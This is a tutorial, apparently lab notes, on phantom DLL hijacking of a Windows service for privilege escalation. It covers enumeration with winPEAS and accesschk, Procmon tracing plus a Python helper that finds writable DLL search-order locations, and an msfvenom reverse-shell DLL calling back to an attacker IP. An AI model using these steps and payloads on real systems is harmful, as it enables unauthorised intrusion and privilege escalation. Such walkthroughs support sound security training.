Phantom DLL Hijacking / Replacement

In this variant we target a DLL that the service tries to load but which does not exist anywhere on disk, and we place our own DLL in a directory the loader searches.

Finding the target

Use winPEAS to enumerate non-Windows services:

winPEASany.exe quiet servicesinfo

Note from the output that the C:\Temp directory is writable and is in the PATH. Next, check which of the listed services our user can stop and start, starting with dllsvc:

accesschk.exe /accepteula -uvqc user dllsvc

The “dllsvc” service is vulnerable to DLL Hijacking. According to the winPEAS output, the service runs the dllhijackservice.exe executable. We can confirm this manually:

sc qc dllsvc

In a real-world scenario we would copy the executable to our own Windows analysis machine, create a new service that points at the copied binary, and then continue with the steps below.

Create a service for the binary on our own system:

sc create dllsvc binPath= c:\temp\dllhijackservice.exe type= own

Run Procmon64.exe with administrator privileges. Press Ctrl+L to open the Filter menu.

Add a new filter: Process Name is dllhijackservice.exe.

On the main toolbar, deselect Show Registry Activity and Show Network Activity so that only file system and process events remain.

Start the service:

net start dllsvc

Back in Procmon, note the series of “NAME NOT FOUND” results for hijackme.dll: the service walks the DLL search order and fails to find the file in every directory it probes.

One of the directories probed is C:\Temp, which, as we found earlier, is on the PATH and writable by our user.
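To make the Procmon step repeatable, here is an added Python script (not part of the original notes) that reads a Procmon CSV export, lists the directories probed for every DLL the process never found, and flags the ones a low-privileged user can write to. The column layout is assumed to be Procmon's default CSV export, and the log lines and the writable-directory list are constructed for the example.

```python
import csv
import io

# Constructed sample in the default Procmon CSV export layout (assumed columns:
# Time of Day, Process Name, PID, Operation, Path, Result, Detail).
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.0001","dllhijackservice.exe","1234","CreateFile","C:\Program Files\svc\version.dll","NAME NOT FOUND","Desired Access: Read"
"10:01:02.0002","dllhijackservice.exe","1234","CreateFile","C:\Windows\System32\version.dll","SUCCESS","Desired Access: Read"
"10:01:02.0003","dllhijackservice.exe","1234","CreateFile","C:\Windows\System32\hijackme.dll","NAME NOT FOUND","Desired Access: Read"
"10:01:02.0004","dllhijackservice.exe","1234","CreateFile","C:\Windows\hijackme.dll","NAME NOT FOUND","Desired Access: Read"
"10:01:02.0005","dllhijackservice.exe","1234","CreateFile","C:\Temp\hijackme.dll","NAME NOT FOUND","Desired Access: Read"
"10:01:02.0006","dllhijackservice.exe","1234","RegOpenKey","HKLM\SYSTEM\CurrentControlSet\Services\dllsvc","NAME NOT FOUND",""
"10:01:02.0007","svchost.exe","800","CreateFile","C:\Temp\other.dll","NAME NOT FOUND","Desired Access: Read"
'''

def missing_dll_search_order(csv_text, process_name):
    """Return {dll: [directories probed, in order]} for DLLs the process never
    found anywhere (the phantom case); DLLs found later (version.dll) are dropped."""
    probed, found = {}, set()
    for row in csv.DictReader(io.StringIO(csv_text)):
        if (row["Process Name"].lower() != process_name.lower()
                or row["Operation"] != "CreateFile"):
            continue
        directory, _, name = row["Path"].rpartition("\\")
        name = name.lower()
        if not name.endswith(".dll"):
            continue
        if row["Result"] == "SUCCESS":
            found.add(name)
        elif row["Result"] == "NAME NOT FOUND":
            probed.setdefault(name, []).append(directory)
    return {dll: dirs for dll, dirs in probed.items() if dll not in found}

def writable_hijack_points(search_order, writable_dirs):
    """Keep only the probed directories that are writable by a low-privileged
    user (the directories winPEAS/accesschk reported earlier)."""
    writable = {d.rstrip("\\").lower() for d in writable_dirs}
    result = {}
    for dll, dirs in search_order.items():
        exposed = [d for d in dirs if d.lower() in writable]
        if exposed:
            result[dll] = exposed
    return result

if __name__ == "__main__":
    order = missing_dll_search_order(SAMPLE_CSV, "dllhijackservice.exe")
    for dll, dirs in writable_hijack_points(order, [r"C:\Temp"]).items():
        print(f"{dll}: probed in writable location(s) {dirs}")
```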

Exploitation

On Kali, generate a reverse shell DLL named hijackme.dll:

msfvenom -p windows/shell_reverse_tcp lhost=192.168.56.1 lport=5555 -f dll -o VirtualBox\ VMs/shares/hijackme.dll

Copy the DLL to the Windows VM and into the C:\Temp directory. Start a listener on Kali and then stop/start the service to trigger the exploit:

net stop dllsvc
net start dllsvc

In the replacement variant the DLL already exists: if we have write access to its directory, we can overwrite it with our own DLL and restart the service.
